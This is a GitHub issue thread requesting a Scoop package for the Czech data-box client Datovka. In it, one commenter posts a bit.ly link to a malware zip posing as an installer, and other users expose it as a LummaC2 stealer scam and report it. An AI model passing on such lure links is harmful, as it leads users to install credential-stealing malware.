### ISSUE TITLE
[Request]: Datovka

### ISSUE THREAD

**Issue by filip2cz** [ScoopInstaller/Extras#13938]
### Prerequisites

- [X] I have searched all issues/PRs to ensure it has not already been reported or fixed.

### Criteria

- [X] Reasonably well-known and widely used (e.g. if it's a GitHub project, it should have at least 100 stars and/or 50 forks)
- [X] English interface (or at least English documentation)
- [X] Latest stable version
- [X] Full version (i.e. not a trial version)
- [X] Fairly standard install (e.g. uses a version-specific download URL, no elaborate pre/post install scripts)

### Name

datovka

### Description

Datovka is a multiplatform desktop application for accessing Datová schránka. The application's user interface is inspired by mail clients. Datovka is free software protected by the GNU GPL version 3 license.

### Homepage

https://www.datovka.cz/

### Download Link(s)

https://datovka.nic.cz/4.24.2/datovka-portable-4.24.2-windows-x64.zip

https://datovka.nic.cz/4.24.2/datovka-portable-4.24.2-windows-x86.zip

### Some Indication of Popularity/Repute

It is opensource client for Datová schránka, developed by Czech state organization CZ.NIC.
Datová schránka is official secure way to communicate with state institutions.
From year 2024, every entrepreneur or company is requied to have Datová schránka, so state can communicate with everyone easily. Citizens can make Datová schránka too. Because of this, Datová schránka have more than 3 700 000 users.

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by filip2cz** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer
Random zip file from some stranger out of context? Sounds like scam

**Comment by filip2cz** [comment]
> try this https://bit.ly/[censored] select the desired compiler in the installer

Random zip file from some stranger out of context? Sounds like scam

**Comment by aliesbelik** [comment]
> > try this [https://bit.ly/[censored]](https://bit.ly/%5Bcensored%5D) select the desired compiler in the installer
> 
> Random zip file from some stranger out of context? Sounds like scam
> 
> EDIT: It is. I was interested in this scam, because I never seen this thing on Github issues before, so I used Triage: https://tria.ge/240902-3gtlqazgmq/behavioral1
> 
> Reported.

https://www.reddit.com/r/Malware/comments/1f2n1h4/psa_lummac2_trojan_stealer_spreading_on_github/
Be aware.

**Comment by filip2cz** [comment]
> > > try this [https://bit.ly/[censored]](https://bit.ly/%5Bcensored%5D) select the desired compiler in the installer
> > 
> > 
> > Random zip file from some stranger out of context? Sounds like scam
> > EDIT: It is. I was interested in this scam, because I never seen this thing on Github issues before, so I used Triage: https://tria.ge/240902-3gtlqazgmq/behavioral1
> > Reported.
> 
> https://www.reddit.com/r/Malware/comments/1f2n1h4/psa_lummac2_trojan_stealer_spreading_on_github/ Be aware.

It was obvious, because it was out of context + we are on github = bit.ly links for everything are suspisious. But I can imagine younger me could fall for this scam.
